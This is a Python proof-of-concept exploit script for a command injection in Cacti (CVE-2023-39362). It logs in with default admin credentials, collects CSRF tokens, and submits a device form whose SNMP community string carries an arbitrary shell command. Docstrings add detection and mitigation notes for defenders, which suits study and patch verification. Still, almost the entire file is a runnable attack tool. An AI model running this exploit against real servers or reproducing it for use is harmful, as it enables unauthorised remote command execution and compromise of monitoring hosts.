from bs4 import BeautifulSoup
import requests
import argparse
import time
# Request headers shared by every form POST this script sends to Cacti:
# the body is URL-encoded form data and an HTML response is requested.
headers_post = dict(
    [
        ("Accept", "text/html"),
        ("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"),
    ]
)
# Log in to Cacti and hand back the cookie jar used by the later requests.
def perform_login(url, username, password):
    """Authenticate against the Cacti login form.

    The device form sent later in this script is submitted with the cookies
    returned here, so a valid account is a precondition for everything that
    follows.

    Args:
        url: Base URL of the host; "/cacti/index.php" is appended to it.
        username: Account name submitted as ``login_username``.
        password: Password submitted as ``login_password``.

    Returns:
        The cookie jar received from the initial GET when the login response
        has status 200 and does not contain "Access Denied!"; otherwise None.
    """
    login_page = url + "/cacti/index.php"

    # First request: collect the pre-login cookies and the CSRF token that is
    # embedded in the login form.
    landing = requests.get(login_page, allow_redirects=True)
    form_token = extract_csrf_token(landing.text)
    jar = landing.cookies

    credentials = {
        "__csrf_magic": form_token,
        "action": "login",
        "login_username": username,
        "login_password": password
    }
    outcome = requests.post(
        login_page,
        headers=headers_post,
        cookies=jar,
        data=credentials,
        allow_redirects=True,
    )

    # NOTE(review): the jar handed back is the one issued before login; any
    # cookie set by the POST response is not merged into it.
    rejected = 'Access Denied!' in outcome.text or outcome.status_code != 200
    return None if rejected else jar
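def add_new_device(url, cookies, cmd):
    """Submit Cacti's "save device" form with a crafted SNMP community string.

    This is the request that exercises CVE-2023-39362. The only field that
    carries attacker-controlled content is ``snmp_community``, where ``cmd``
    is wrapped in quote and semicolon characters; every other field is a
    fixed value.

    Defender notes:
      * Detection: a POST to ``/cacti/host.php`` with ``action=save`` whose
        ``snmp_community`` value contains quotes or ``;`` is not a
        legitimate community string and is worth alerting on. Devices named
        "DEVICE" with hostname "HOSTNAME" are what this script leaves behind.
      * Mitigation: run a Cacti release that contains the fix for
        CVE-2023-39362 and limit which accounts may create or edit devices.

    Args:
        url: Base URL of the host; "/cacti/host.php" is appended to it.
        cookies: Authenticated cookie jar, as returned by perform_login.
        cmd: String interpolated into the ``snmp_community`` field.

    Returns:
        None. Progress is reported on stdout.
    """
    print("[+] Adding a new device with command injection payload")
    # The form is CSRF-protected, so a fresh token is fetched from the
    # device-creation page before posting.
    csrf_magic_token = get_csrf_magic_token(url, cookies)
    post_data = {
        "__csrf_magic": csrf_magic_token,
        "description": "DEVICE",
        "hostname": "HOSTNAME",
        "host_template_id": "9",
        "snmp_version": "2",
        # Injection point: the community string is expected to be a plain
        # SNMP community, not something containing shell metacharacters.
        "snmp_community": f"public\\' ; {cmd} ; \\'",
        "snmp_security_level": "authPriv",
        "snmp_auth_protocol": "MD5",
        "snmp_priv_protocol": "DES",
        "snmp_port": "161",
        "snmp_timeout": "500",
        "max_oids": "10",
        "bulk_walk_size": "-1",
        "availability_method": "2",
        "ping_method": "1",
        "ping_port": "23",
        "ping_timeout": "400",
        "id": "0",
        "save_component_host": "1",
        "action": "save"
    }
    print("[+] Sending POST request with command injection payload to add a new device.")
    response = requests.post(
        f"{url}/cacti/host.php?header=false",
        headers=headers_post,
        cookies=cookies,
        data=post_data,
        allow_redirects=True,
    )
    if response.ok:
        # A 2xx status only shows that the form was accepted. It says nothing
        # about whether the server ran the command, so the script must not
        # report this as a confirmed injection: using the old message to
        # check a patched host would produce a false positive.
        print("[+] Device save request returned a success status; command execution was NOT verified.")
    else:
        print("[-] Something went wrong. Command injection is unsuccessful.")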
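# Function to get the csrfMagicToken from the response
def get_csrf_magic_token(url, cookies):
    """Fetch the device-creation page and return its CSRF token.

    Args:
        url: Base URL of the host; "/cacti/host.php?action=edit&create=true"
            is appended to it.
        cookies: Authenticated cookie jar sent with the request.

    Returns:
        The ``__csrf_magic`` value found in the page.

    Raises:
        SystemExit: with status 1 when no token value is found. The original
            called ``exit(0)``, which reported success to the calling shell
            even though the run had failed.
    """
    print("[+] Extracting csrfMagicToken...")
    response = requests.get(
        f"{url}/cacti/host.php?action=edit&create=true",
        cookies=cookies,
        allow_redirects=True,
    )
    csrf_token = extract_csrf_token(response.text)
    if not csrf_token:
        print('[-] Can\'t extract csrfMagicToken. Exiting...')
        # Non-zero status so wrappers and CI jobs can tell the run failed.
        raise SystemExit(1)
    print('[+] The csrfMagicToken obtained.')
    return csrf_token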
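# Function to extract CSRF token
def extract_csrf_token(response_text):
    """Return the value of the hidden ``__csrf_magic`` input, or None.

    Args:
        response_text: HTML body of a Cacti page.

    Returns:
        The ``value`` attribute of the first ``<input name="__csrf_magic">``
        element, or None when the page has no such element (for example an
        error page or a redirect target). The original dereferenced the
        lookup result unconditionally and raised AttributeError in that case,
        which made the "token missing" branch in get_csrf_magic_token
        unreachable.
    """
    soup = BeautifulSoup(response_text, 'html.parser')
    token_input = soup.find('input', {'name': '__csrf_magic'})
    if token_input is None:
        return None
    return token_input.get('value')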
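if __name__ == "__main__":
    # Command-line argument parsing
    parser = argparse.ArgumentParser(description="Cacti Command Injection vulnerability (CVE-2023-39362) PoC exploit script")
    # The script appends "/cacti/..." to this value, so it is the base URL of
    # the host without a trailing slash.
    parser.add_argument("--url", required=True, help="Cacti host URL")
    # The credential defaults are admin/admin. An installation that still
    # accepts them leaves every authenticated-only issue, this one included,
    # open to anyone who can reach the login page; changing them is part of
    # the mitigation.
    parser.add_argument("-u", "--username", default="admin", help="Username (default: admin)")
    parser.add_argument("-p", "--password", default="admin", help="Password (default: admin)")
    parser.add_argument("--cmd", default="", help="Command to execute")

    # Parse command-line arguments
    args = parser.parse_args()

    # Perform login; a falsy result means the login response was rejected.
    cookies = perform_login(args.url, args.username, args.password)
    if not cookies:
        print('[-] Login failed. Check your credentials.')
        # Exit non-zero: the original used exit(0), which signalled success
        # to the calling shell on a failed run.
        raise SystemExit(1)

    print('[+] Login is successful.')
    add_new_device(args.url, cookies, args.cmd)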